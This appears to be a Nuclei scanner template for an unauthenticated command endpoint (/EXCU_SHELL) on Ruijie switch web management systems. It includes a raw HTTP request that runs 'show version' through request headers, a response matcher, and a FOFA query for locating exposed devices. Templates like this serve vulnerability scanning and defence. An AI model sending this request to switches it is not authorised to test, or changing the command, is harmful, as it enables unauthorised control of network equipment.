id: ruijie-switch-configuration-leak

info:
  name: ruijie-switch-configuration-leak
  author: user
  severity: high
  description: 锐捷交换机 WEB 管理系统 EXCU_SHELL信息泄露
  reference:
    - https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BAWEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FEXCU_SHELL
  tags: Ruijie
  metadata:
    fofa-query: 'body="img/free_login_ge.gif" && body="./img/login_bg.gif"'

requests:
  - raw:
      - |+
        GET /EXCU_SHELL HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
        mode: EN
        cmdnum: 1
        command1: show%20version
        confirm1: n
        Connection: close
    matchers:
      - type: status
        status:
        - 200
      - type: word
        part: body
        words:
          - Ruijie Operating System Software
